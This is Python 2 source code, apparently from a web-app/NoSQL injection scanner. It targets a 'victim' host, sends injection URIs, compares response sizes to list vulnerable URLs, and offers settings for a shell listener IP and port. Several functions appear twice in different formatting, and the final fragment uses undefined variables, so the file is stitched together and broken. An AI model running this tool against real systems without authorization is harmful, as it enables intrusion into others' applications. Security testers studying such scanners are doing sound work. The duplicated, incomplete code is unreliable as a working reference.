def checkResult(baseSize, respSize, index, uriArray):
delta = abs(respSize - baseSize)
if (delta >= 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response varied " + str(
delta) + " bytes from random parameter value! Injection works!"
else:
print "Successful injection!"
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_vulnAddrs().append(uriArray[index])
else:
post = 0
#post
return
elif (delta > 0) and (delta < 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response variance was only " + str(
delta
) + " bytes. Injection might have worked but difference is too small to be certain. "
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs().append(uriArray[index])
else:
post = 0
# post
return
elif (delta == 0):
if GlobalVar.get_verb() == "ON":
print "Random string response size and not equals injection were the same. Injection did not work."
else:
print "Injection failed."
return
else:
if GlobalVar.get_verb() == "ON":
print "Injected response was smaller than random response. Injection may have worked but requires verification."
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs.append(uriArray[index])
else:
post = 0
# post
return
def checkResult(baseSize, respSize, index,uriArray):
delta = abs(respSize - baseSize)
if (delta >= 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response varied " + str(delta) + " bytes from random parameter value! Injection works!"
else:
print "Successful injection!"
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_vulnAddrs().append(uriArray[index])
else:
post = 0
#post
return
elif (delta > 0) and (delta < 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response variance was only " + str(
delta) + " bytes. Injection might have worked but difference is too small to be certain. "
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs().append(uriArray[index])
else:
post = 0
# post
return
elif (delta == 0):
if GlobalVar.get_verb() == "ON":
print "Random string response size and not equals injection were the same. Injection did not work."
else:
print "Injection failed."
return
else:
if GlobalVar.get_verb() == "ON":
print "Injected response was smaller than random response. Injection may have worked but requires verification."
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs.append(uriArray[index])
else:
post = 0
# post
return
def getApps(): #define the Attack method
print "Web App Attacks (GET)"
print "====================="
#verify app is working
print "checking to see if site at" + str(
GlobalVar.get_victim()) + ":" + str(GlobalVar.get_webPort()) + str(
GlobalVar.get_url()) + " is up..."
appUp = False #make flag of login successful
if (GlobalVar.get_https() == "OFF"):
appURL = "http://" + str(GlobalVar.get_victim()) + ":" + str(
GlobalVar.get_webPort()) + str(GlobalVar.get_url())
else:
appURL = "https://" + str(GlobalVar.get_victim()) + ":" + str(
GlobalVar.get_webPort()) + str(GlobalVar.get_url())
requestHeaders = {}
try:
req = urllib2.Request(appURL, None, requestHeaders)
appRespCode = urllib2.urlopen(req).getcode()
if appRespCode == 200:
normLength = int(len(urllib2.urlopen(req).read()))
timeReq = urllib2.urlopen(req)
start = time.time()
page = timeReq.read()
end = time.time()
timeReq.close()
timeBase = round((end - start), 3)
if GlobalVar.get_verb() == "ON":
print "App is up! Got response length of " + str(
normLength) + " and response time of " + str(
timeBase) + " seconds. Starting injection test.\n"
else:
print "App is up!"
appUp = True
else:
print "Got " + str(
appRespCode) + "from the app, check your options."
except Exception, e:
print e
print "Looks like the server didn't respond. Check your options."
def getApps():#define the Attack method
print "Web App Attacks (GET)"
print "====================="
#verify app is working
print "checking to see if site at"+ str(GlobalVar.get_victim()) + ":" + str(GlobalVar.get_webPort()) + str(GlobalVar.get_url()) + " is up..."
appUp = False #make flag of login successful
if(GlobalVar.get_https() == "OFF"):
appURL = "http://" + str(GlobalVar.get_victim()) + ":" + str(GlobalVar.get_webPort()) + str(GlobalVar.get_url())
else:
appURL = "https://" + str(GlobalVar.get_victim()) + ":" + str(GlobalVar.get_webPort()) + str(GlobalVar.get_url())
requestHeaders = {}
try:
req = urllib2.Request(appURL, None, requestHeaders)
appRespCode = urllib2.urlopen(req).getcode()
if appRespCode == 200:
normLength = int(len(urllib2.urlopen(req).read()))
timeReq = urllib2.urlopen(req)
start = time.time()
page = timeReq.read()
end = time.time()
timeReq.close()
timeBase = round((end - start), 3)
if GlobalVar.get_verb() == "ON":
print "App is up! Got response length of " + str(normLength) + " and response time of " + str(
timeBase) + " seconds. Starting injection test.\n"
else:
print "App is up!"
appUp = True
else:
print "Got " + str(appRespCode) + "from the app, check your options."
except Exception, e:
print e
print "Looks like the server didn't respond. Check your options."
def option():
'''
global victim
global webPort
global uri
global https
https = 1
global platform
global httpMethod
global postData
global myIP
global myPort
global verb
global mmSelect
global dbPort
global requestHeaders#
global optionSet
optionSet = [False]*9
# GlobalVar.set_optionSet(0,True);
# print GlobalVar.get_optionSet(0);
requestHeaders = {}
'''
optSelect = True
#print "test"
if GlobalVar.get_optionSet(0) == False:
# if optionSet[0] == False:
GlobalVar.set_victim("Not Set")
if GlobalVar.get_optionSet(1) == False:
GlobalVar.set_webPort(80)
GlobalVar.set_optionSet(1,True)
if GlobalVar.get_optionSet(2) == False: #Set App Path (Current: Not Set)
GlobalVar.set_url("Not Set")
if GlobalVar.get_optionSet(3) == False:
GlobalVar.set_httpMethod("GET")
if GlobalVar.get_optionSet(4) == False:
GlobalVar.set_myIP("127.0.0.1")
GlobalVar.set_optionSet(4, True)
if GlobalVar.get_optionSet(5) == False:
GlobalVar.set_myPort("Not Set")
if GlobalVar.get_optionSet(6) == False:
GlobalVar.set_verb("OFF")
if GlobalVar.get_optionSet(8) == False:
GlobalVar.set_https("OFF")
GlobalVar.set_optionSet(8, True)
while optSelect:
print "\n\n"
print "Options"
print "1-Set target host/IP (Current: " + str(GlobalVar.get_victim()) + ")"
print "2-Set web app port (Current: " + str(GlobalVar.get_webPort()) + ")"
print "3-Set App Path (Current: " + str(GlobalVar.get_url()) + ")"
print "4-Toggle HTTPS (Current: " + str(GlobalVar.get_https()) + ")" # set http or https
print "5-Set " + GlobalVar.get_platform() + " Port (Current : " + str(GlobalVar.get_dbPort()) + ")"
print "6-Set HTTP Request Method (GET/POST) (Current: " + GlobalVar.get_httpMethod() + ")"
print "7-Set my local " + GlobalVar.get_platform() + "/Shell IP (Current: " + str(GlobalVar.get_myIP()) + ")"
print "8-Set shell listener port (Current: " + str(GlobalVar.get_myPort()) + ")"
print "9-Toggle Verbose Mode: (Current: " + str(GlobalVar.get_verb()) + ")" # more detail infor while attacking
print "x-Back to main menu"
select = raw_input("Set an option:")
if select == '1':
# optionSet[0] = False
GlobalVar.set_optionSet(0,False) #if reset host ip, optionSet[0] should be false again
while GlobalVar.get_optionSet(0) == False:
notDNS = True
goodDigits = True
victim = raw_input("Enter host or IP/DNS name:")
octets = victim.split(".")
if len(octets) != 4:
GlobalVar.set_optionSet(0,False)
notDNS = False
else:
for item in octets:
try:
if int(item)<0 or int(item)>255:
print "Bad octets in IP address."
goodDigits = False
except:
notDNS = False
if goodDigits == True or notDNS == False:
print "\nTarget set to:" + victim + "\n"
GlobalVar.set_victim(victim)
GlobalVar.set_optionSet(0,True)
elif select == '3':
url = raw_input("Enter URL path(Press enter for no URL):")
print "\nHTTP port set to " + str(GlobalVar.get_webPort()) + "\n"
GlobalVar.set_optionSet(2,True)
GlobalVar.set_url(url)
elif select == '7':
GlobalVar.set_optionSet(4,False)
while GlobalVar.get_optionSet(4) == False:
goodLen = False
goodDigits = True
myIP = raw_input("Enter host IP for my "+ GlobalVar.get_platform() +"/Shells:")
octets = myIP.split(".")
if len(octets) != 4:
print "Invalid IP length."
else:
goodLen = True
for item in octets:
try:
if int(item)<0 or int(item)>255:
print "Bad octets in IP address."
goodDigits = False
except:
goodDigits = False
if goodDigits == True and goodLen == True:
print "\nShell/DB listener set to "+ myIP +"\n"
GlobalVar.set_myIP(myIP)
GlobalVar.set_optionSet(4,True)
elif select == "9":
if GlobalVar.get_verb() == "OFF":
print "Verbose output enabled."
GlobalVar.set_verb("ON")
GlobalVar.set_optionSet(6,True)
elif GlobalVar.get_verb() == "ON":
print "Verbose output disabled."
GlobalVar.set_verb("OFF")
GlobalVar.set_optionSet(6, True)
elif select == 'x':
return
def option():
'''
global victim
global webPort
global uri
global https
https = 1
global platform
global httpMethod
global postData
global myIP
global myPort
global verb
global mmSelect
global dbPort
global requestHeaders#
global optionSet
optionSet = [False]*9
# GlobalVar.set_optionSet(0,True);
# print GlobalVar.get_optionSet(0);
requestHeaders = {}
'''
optSelect = True
#print "test"
if GlobalVar.get_optionSet(0) == False:
# if optionSet[0] == False:
GlobalVar.set_victim("Not Set")
if GlobalVar.get_optionSet(1) == False:
GlobalVar.set_webPort(80)
GlobalVar.set_optionSet(1, True)
if GlobalVar.get_optionSet(2) == False: #Set App Path (Current: Not Set)
GlobalVar.set_url("Not Set")
if GlobalVar.get_optionSet(3) == False:
GlobalVar.set_httpMethod("GET")
if GlobalVar.get_optionSet(4) == False:
GlobalVar.set_myIP("127.0.0.1")
GlobalVar.set_optionSet(4, True)
if GlobalVar.get_optionSet(5) == False:
GlobalVar.set_myPort("Not Set")
if GlobalVar.get_optionSet(6) == False:
GlobalVar.set_verb("OFF")
if GlobalVar.get_optionSet(8) == False:
GlobalVar.set_https("OFF")
GlobalVar.set_optionSet(8, True)
while optSelect:
print "\n\n"
print "Options"
print "1-Set target host/IP (Current: " + str(
GlobalVar.get_victim()) + ")"
print "2-Set web app port (Current: " + str(
GlobalVar.get_webPort()) + ")"
print "3-Set App Path (Current: " + str(GlobalVar.get_url()) + ")"
print "4-Toggle HTTPS (Current: " + str(
GlobalVar.get_https()) + ")" # set http or https
print "5-Set " + GlobalVar.get_platform() + " Port (Current : " + str(
GlobalVar.get_dbPort()) + ")"
print "6-Set HTTP Request Method (GET/POST) (Current: " + GlobalVar.get_httpMethod(
) + ")"
print "7-Set my local " + GlobalVar.get_platform(
) + "/Shell IP (Current: " + str(GlobalVar.get_myIP()) + ")"
print "8-Set shell listener port (Current: " + str(
GlobalVar.get_myPort()) + ")"
print "9-Toggle Verbose Mode: (Current: " + str(
GlobalVar.get_verb()) + ")" # more detail infor while attacking
print "x-Back to main menu"
select = raw_input("Set an option:")
if select == '1':
# optionSet[0] = False
GlobalVar.set_optionSet(
0,
False) #if reset host ip, optionSet[0] should be false again
while GlobalVar.get_optionSet(0) == False:
notDNS = True
goodDigits = True
victim = raw_input("Enter host or IP/DNS name:")
octets = victim.split(".")
if len(octets) != 4:
GlobalVar.set_optionSet(0, False)
notDNS = False
else:
for item in octets:
try:
if int(item) < 0 or int(item) > 255:
print "Bad octets in IP address."
goodDigits = False
except:
notDNS = False
if goodDigits == True or notDNS == False:
print "\nTarget set to:" + victim + "\n"
GlobalVar.set_victim(victim)
GlobalVar.set_optionSet(0, True)
elif select == '3':
url = raw_input("Enter URL path(Press enter for no URL):")
print "\nHTTP port set to " + str(GlobalVar.get_webPort()) + "\n"
GlobalVar.set_optionSet(2, True)
GlobalVar.set_url(url)
elif select == '7':
GlobalVar.set_optionSet(4, False)
while GlobalVar.get_optionSet(4) == False:
goodLen = False
goodDigits = True
myIP = raw_input("Enter host IP for my " +
GlobalVar.get_platform() + "/Shells:")
octets = myIP.split(".")
if len(octets) != 4:
print "Invalid IP length."
else:
goodLen = True
for item in octets:
try:
if int(item) < 0 or int(item) > 255:
print "Bad octets in IP address."
goodDigits = False
except:
goodDigits = False
if goodDigits == True and goodLen == True:
print "\nShell/DB listener set to " + myIP + "\n"
GlobalVar.set_myIP(myIP)
GlobalVar.set_optionSet(4, True)
elif select == "9":
if GlobalVar.get_verb() == "OFF":
print "Verbose output enabled."
GlobalVar.set_verb("ON")
GlobalVar.set_optionSet(6, True)
elif GlobalVar.get_verb() == "ON":
print "Verbose output disabled."
GlobalVar.set_verb("OFF")
GlobalVar.set_optionSet(6, True)
elif select == 'x':
return
return ()
buildAttackSet = buildAttackUri(appURL, injectString)
uriArray = buildAttackSet[0]
attackDescriptionSet = buildAttackSet[1]
for item in uriArray:
print item
for item in attackDescriptionSet:
print item
#This randomUri is same with URI which user input in option except parameter
randomUri = uriArray[0]
print "URI :" + randomUri
req = urllib2.Request(randomUri, None, requestHeaders)
if GlobalVar.get_verb() == "ON":
print "Checking random injected parameter HTTP response size using " + randomUri + "...\n"
else:
print "Sending random parameter value..."
randLength = int(len(urllib2.urlopen(req).read()))
print "Got response length of " + str(randLength) + "."
randNormDelta = abs(normLength - randLength)
if randNormDelta == 0:
print "No change in response size injecting a random parameter..\n"
else:
print "Random value variance: " + str(randNormDelta) + "\n"
attackEffectiveSum = attackDescriptionSet[0]
print "req:" + urllib2.urlopen(req).read()
# print "No change in response size injecting a random parameter..\n"
# else:
# print "Random value variance: " + str(differenceLength) + "\n"
# print "req:" + urllib2.urlopen(req).read()
# print "requestHeaders" + requestHeaders
print "\n"
print "Start injection:"
for index in range(0,attackSum):
print "injecting: " + uriArray[index]
# if GlobalVar.get_verb() == "ON":
# print "Checking random injected parameter HTTP response size using " + uriArray[index] + "...\n"
# else:
# print "Sending random parameter value..."
if GlobalVar.get_verb() == "ON":
print attackDescriptionSet[index]
req = urllib2.Request(uriArray[index], None, requestHeaders)
errorCheck = errorTest(str(urllib2.urlopen(req).read()), index, uriArray)
if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(normLength, injLen, index, uriArray)
print "\n"
print "Vulnerable URLs:"
print "\n".join(GlobalVar.get_vulnAddrs())
print "\n"
print "Possibly vulnerable URLs:"
print"\n".join(GlobalVar.get_possAddrs())
print "\n"
print "Timing based attacks:"
